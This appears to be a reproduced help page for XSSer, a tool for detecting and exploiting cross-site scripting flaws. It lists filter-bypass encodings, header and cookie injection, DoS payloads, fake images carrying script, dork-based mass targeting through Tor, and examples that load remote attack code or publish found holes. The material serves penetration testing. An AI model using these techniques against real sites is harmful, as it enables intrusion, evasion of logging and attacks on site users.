XSSer-Automatic Tool Pentesting XSS Attacks

1. Cross Site "Scripter" is an automatic -framework- to detect, exploit and report XSS vulnerabilities in web-based aplications.
2.  
3. It contains several options to try to bypass certain filters, and various special techniques of code injection.
4.  
5. Usage
6.  
7. xsser [OPTIONS] [-u |-i |-d ] [-g |-p |-c ] [Request(s)] [Vector(s)] [Bypasser(s)] [Technique(s)] [Final Injection(s)]
8. Options:
9.  
10. --version show program's version number and exit
11. -h, --help show this help message and exit
12. -s, --statistics show advanced statistics output results
13. -v, --verbose verbose (default: no)
14. --gtk launch XSSer GTK Interface
15. *Special Features*:
16. You can choose Vector(s) and Bypasser(s) to inject code with this extra special features:
17.  
18. --imx=IMX create a false image with XSS code embedded
19. --fla=FLASH create a false .swf file with XSS code embedded
20. *Select Target(s)*:
21. At least one of these options has to be specified to set the source to get target(s) urls from.
22. You need to choose to run XSSer:
23.  
24. -u URL, --url=URL Enter target(s) to audit
25. -i READFILE Read target URLs from a file
26. -d DORK Process search engine dork results as target urls
27. --De=DORK_ENGINE Search engine to use for dorking (bing, altavista,
28. yahoo, baidu, yandex, youdao, webcrawler, ask, etc.
29. See dork.py file to check for available engines)
30. *Select type of HTTP/HTTPS Connection(s)*:
31. These options can be used to specify which parameter(s) we want to use like payload to inject code.
32.  
33. -g GETDATA Enter payload to audit using GET. (ex: '/menu.php?q=')
34. -p POSTDATA Enter payload to audit using POST. (ex: 'foo=1&bar=')
35. -c CRAWLING Number of urls to crawl on target(s): 1-99999
36. --Cw=CRAWLING_WIDTH Deeping level of crawler: 1-5
37. --Cl Crawl only local target(s) urls (default TRUE)
38. *Configure Request(s)*:
39. These options can be used to specify how to connect to target(s) payload(s).
40. You can select multiple:
41.  
42. --cookie=COOKIE Change your HTTP Cookie header
43. --user-agent=AGENT Change your HTTP User-Agent header (default SPOOFED)
44. --referer=REFERER Use another HTTP Referer header (default NONE)
45. --headers=HEADERS Extra HTTP headers newline separated
46. --auth-type=ATYPE HTTP Authentication type (value Basic or Digest)
47. --auth-cred=ACRED HTTP Authentication credentials (value name:password)
48. --proxy=PROXY Use proxy server (tor: http://localhost:8118)
49. --timeout=TIMEOUT Select your Timeout (default 30)
50. --delay=DELAY Delay in seconds between each HTTP request (default 8)
51. --threads=THREADS Maximum number of concurrent HTTP requests (default 5)
52. --retries=RETRIES Retries when the connection timeouts (default 3)
53. *Select Vector(s)*:
54. These options can be used to specify a XSS vector source code to inject in each payload.
55. Important, if you don't want to try to inject a common XSS vector, used by default.
56. Choose only one option:
57.  
58. --payload=SCRIPT OWN - Insert your XSS construction -manually-
59. --auto AUTO - Insert XSSer 'reported' vectors from file
60. *Select Bypasser(s)*:
61. These options can be used to encode selected vector(s) to try to bypass all possible anti-XSS filters on target(s) code and some IPS rules, if the target use it.
62. Also, can be combined with other techniques to provide encoding:
63.  
64. --Str Use method String.FromCharCode()
65. --Une Use function Unescape()
66. --Mix Mix String.FromCharCode() and Unescape()
67. --Dec Use Decimal encoding
68. --Hex Use Hexadecimal encoding
69. --Hes Use Hexadecimal encoding, with semicolons
70. --Dwo Encode vectors IP addresses in DWORD
71. --Doo Encode vectors IP addresses in Octal
72. --Cem Try -manually- different Character Encoding mutations
73. (reverse obfuscation: good) -> (ex:'Mix,Une,Str,Hex')
74.  
75. *Special Technique(s)*:
76. These options can be used to try to inject code using different type of XSS techniques. You can select multiple:
77.  
78. --Coo COO - Cross Site Scripting Cookie injection
79. --Xsa XSA - Cross Site Agent Scripting
80. --Xsr XSR - Cross Site Referer Scripting
81. --Dcp DCP - Data Control Protocol injections
82. --Dom DOM - Use Anchor Stealth (DOM shadows!)
83. --Ind IND - HTTP Response Splitting Induced code
84. --Anchor ANC - Use Anchor Stealth payloader (DOM shadows!)
85. *Select Final injection(s)*:
86. These options can be used to specify the final code to inject in vulnerable target(s). Important, if you want to exploit on-the-wild your discovered vulnerabilities.
87. Choose only one option:
88.  
89. --Fp=FINALPAYLOAD OWN - Insert your final code to inject -manually-
90. --Fr=FINALREMOTE REMOTE - Insert your final code to inject -remotelly-
91. --Doss DOSs - XSS Denial of service (server) injection
92. --Dos DOS - XSS Denial of service (client) injection
93. --B64 B64 - Base64 code encoding in META tag (rfc2397)
94. *Special Final injection(s)*:
95. These options can be used to execute some 'special' injection(s) in vulnerable target(s). You can select multiple and combine with your final code (except with DCP code):
96.  
97. --Onm ONM - Use onMouseMove() event to inject code
98. --Ifr IFR - Use "iframe" source tag to inject code
99. *Miscellaneous*:
100.  
101. --silent inhibit console output results
102. --update check for XSSer latest stable version
103. --save output all results directly to template (XSSlist.dat)
104. --xml=FILEXML output 'positives' to aXML file (--xml filename.xml)
105. --publish output 'positives' to Social Networks (identi.ca)
106. --short=SHORTURLS display -final code- shortered (tinyurl, is.gd)
107. --launch launch a browser at the end with each XSS discovered
108. Examples
109.  
110. If you have interesting examples of usage about XSSer, please send an email to the mailing list.
111.  
112. -------------------
113. * Simple injection from URL:
114.  
115. $ python xsser.py -u "http://host.com"
116. -------------------
117. * Simple injection from File, with tor proxy and spoofing HTTP Referer headers:
118.  
119. $ python xsser.py -i "file.txt" --proxy "http://127.0.0.1:8118" --referer "666.666.666.666"
120. -------------------
121. * Multiple injections from URL, with automatic payloading, using tor proxy, injecting on payloads character encoding in "Hexadecimal", with verbose output and saving results to file (XSSlist.dat):
122.  
123. $ python xsser.py -u "http://host.com" --proxy "http://127.0.0.1:8118" --auto --Hex --verbose -w
124. -------------------
125. * Multiple injections from URL, with automatic payloading, using caracter encoding mutations (first, change payload to hexadecimal; second, change to StringFromCharCode the first encoding; third, reencode to Hexadecimal the second encoding), with HTTP User-Agent spoofed, changing timeout to "20" and using multithreads (5 threads):
126.  
127. $ python xsser.py -u "http://host.com" --auto --Cem "Hex,Str,Hex" --user-agent "XSSer!!" --timeout "20" --threads "5"
128. -------------------
129. * Advance injection from File, payloading your -own- payload and using Unescape() character encoding to bypass filters:
130.  
131. $ python xsser.py -i "urls.txt" --payload 'a="get";b="URL(\"";c="javascript:";d="alert('XSS');\")";eval(a+b+c+d);' --Une
132. -------------------
133. * Injection from Dork selecting "duck" engine (XSSer Storm!):
134.  
135. $ python xsser.py --De "duck" -d "search.php?"
136. -------------------
137. * Injection from Crawler with deep 3 and 4 pages to see (XSSer Spider!):
138.  
139. $ python xsser.py -c3 --Cw=4 -u "http://host.com"
140. -------------------
141. * Simple injection from URL, using POST, with statistics results:
142.  
143. $ python xsser.py -u "http://host.com" -p "index.php?target=search&subtarget=top&searchstring=" -s
144. -------------------
145. * Multiple injections from URL to a parameter sending with GET, using automatic payloading, with IP Octal payloading ofuscation and printering results in a "tinyurl" shortered link (ready for share!):
146.  
147. $ python xsser.py -u "http://host.com" -g "bs/?q=" --auto --Doo --short tinyurl
148. -------------------
149. * Simple injection from URL, using GET, injecting a vector in Cookie parameter, trying to use a DOM shadow space (no server logging!) and if exists any "hole", applying your manual final payload "malicious" code (ready for real attacks!):
150.  
151. $ python xsser.py -u "http://host.com" -g "bs/?q=" --Coo --Dom --Fr="!enter your final injection code here!"
152. -------------------
153. * Simple injection from URL, using GET and trying to generate with results a "malicious" shortered link (is.gd) with a valid DoS (Denegation Of Service) browser client payload:
154.  
155. $ python xsser.py -u "http://host.com" -g "bs/?q=" --Dos --short "is.gd"
156. -------------------
157. * Multiple injections to multiple places, extracting targets from a list in a FILE, applying automatic payloading, changing timeout to "20" and using multithreads (5 threads), increasing delay between petitions to 10 seconds, injecting parameters in HTTP USer-Agent, HTTP Referer and in Cookie parameters, using proxy Tor, with IP Octal ofuscation, with statistics results, in verbose mode and creating shortered links (tinyurl) of any valid injecting payloads found. (real playing mode!):
158.  
159. $ python xsser.py -i "list_of_url_targets.txt" --auto --timeout "20" --threads "5" --delay "10" --Xsa --Xsr --Coo --proxy "http://127.0.0.1:8118" --Doo -s --verbose --Dos --short "tinyurl"
160. -------------------
161. * Injection of user XSS vector directly in a malicious -fake- image created "on the wild", and ready to be uploaded.
162.  
163. $ python xsser.py --Imx "test.png" --payload "!enter your malicious injection code here!"
164. -------------------
165. * Report output 'positives' injections of a dorking search (using "ask" dorker) directly to a XML file.
166.  
167. $ python xsser.py -d "login.php" --De "ask" --xml "security_report_XSSer_Dork_cuil.xml"
168. -------------------
169. * Publish output 'positives' injections of a dorking search (using "duck" dorker) directly to http://identi.ca
170. (federated XSS pentesting botnet)
171.  
172. $ python xsser.py -d "login.php" --De "duck" --publish
173. * Examples online:
174.  
175. - http://identi.ca/xsserbot01
176. - http://twitter.com/xsserbot01
177. -------------------
178. * Create a .swf movie with XSS code injected
179.  
180. $ python xsser.py --fla "name_of_file"
181. -------------------
182. * Send a pre-checking hash to see if target will generate -false positive- results
183.  
184. $ python xsser.py -u "host.com" --hash
185. -------------------
186. * Multiple fuzzing injections from url, including DCP injections and exploiting our "own" code, spoofed in a shortered link, on positive results founded. XSS real-time exploiting.
187.  
188. $ python xsser.py -u "host.com" --auto --Dcp --Fp "enter_your_code_here" --short "is.gd"
189. -------------------
190. * Exploiting Base64 code encoding in META tag (rfc2397) in a manual payload of a vulnerable target.
191.  
192. $ python xsser.py -u "host.com" -g "vulnerable_path" --payload "valid_vector_injected" --B64
193. -------------------
194. * Exploiting our "own" -remote code- in a payload discovered using fuzzing and launch it in a browser directly
195.  
196. $ python xsser.py -u "host.com" -g "vulnerable_path" --auto --Fr "my_host/path/code.js" --launch
197. ScreenShots:
198. http://www.subhashdasyam.com/2011/06/xsser-automatic-tool-pentesting-xss.html
199. http://xsser.sourceforge.net/#download